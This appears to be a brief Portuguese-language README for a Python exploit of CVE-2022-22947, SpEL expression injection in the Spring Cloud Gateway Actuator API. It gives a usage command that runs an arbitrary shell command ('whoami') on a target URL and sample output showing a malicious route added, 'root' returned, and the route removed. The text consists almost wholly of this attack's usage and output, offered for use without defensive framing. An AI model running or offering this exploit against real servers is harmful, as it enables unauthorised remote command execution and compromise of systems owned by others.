
Exp de Injeção de Expressão SpEL e Execução de Comandos na API Actuator do Spring Cloud Gateway
Exploit de injeção de expressão SpEL e execução de comandos no Spring Cloud Gateway Actuator API
Uso: python3 CVE-2022-22947.py -u "http://127.0.0.1:8080" -c "whoami" Resultado: Rota de expressão SpEL maliciosa adicionada com sucesso! Rota atualizada com sucesso! Resultado do ataque obtido com sucesso:
================================================ root
================================================ Rota maliciosa removida! Rota atualizada com sucesso!